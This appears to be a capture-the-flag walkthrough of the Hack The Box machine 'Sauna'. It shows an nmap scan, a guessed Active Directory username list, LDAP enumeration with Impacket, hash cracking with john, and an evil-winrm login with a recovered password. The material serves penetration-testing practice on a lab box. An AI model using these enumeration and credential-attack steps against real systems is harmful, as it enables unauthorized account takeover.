Initial Enumeration

Oogway-white.webp

Starting off with a typical htb nmap scan:

nmap -AT4 -Pn -p- -v -oN Sauna 10.10.10.175

We can see ports 80, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, and 5986 are open.

image-1595089069464.png

 

Definitely a lot of ports to enumerate, so by starting with the most front-end accessible, we will check out the website on port 80

 

Searching around the website we find the Our Team section from the dropdown menu, and find a list of employees

 

image-1595089240902.png

The quote says, ..."So many bank account managers but only one security manager, Sounds about right!"

Take all the first and last names and put them in a list for later. We might need this to try and create credentials 

We know from port 389 that we have Active Directory running. So lets begin to put together a list of usernames based on our the employees names by using standard AD naming conventions.

hugo.bear

scoins

shaun.coins

btaylor

fergus.smith

sdriver

sophie.driver

fersmi

steven.kerb

hugbea

bowie.taylor

steker

fsmith

shacoi

hbear

bowtay

skerb

sopdri

 

With these usernames, lets use one of my favorite tools Impacket, and use some of the scripts from there to enumerate LDAP service. 

image-1595089549530.png

Finally land a user-password combo on user fsmith, and the password is hashed.
Using john to crack the hash, we now can move to trying to login with these creds. We know that winrm is open thanks to our nmap scan. lets login.

evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23

image-1595089755180.png

Success! We are logged in and able to obtain user flag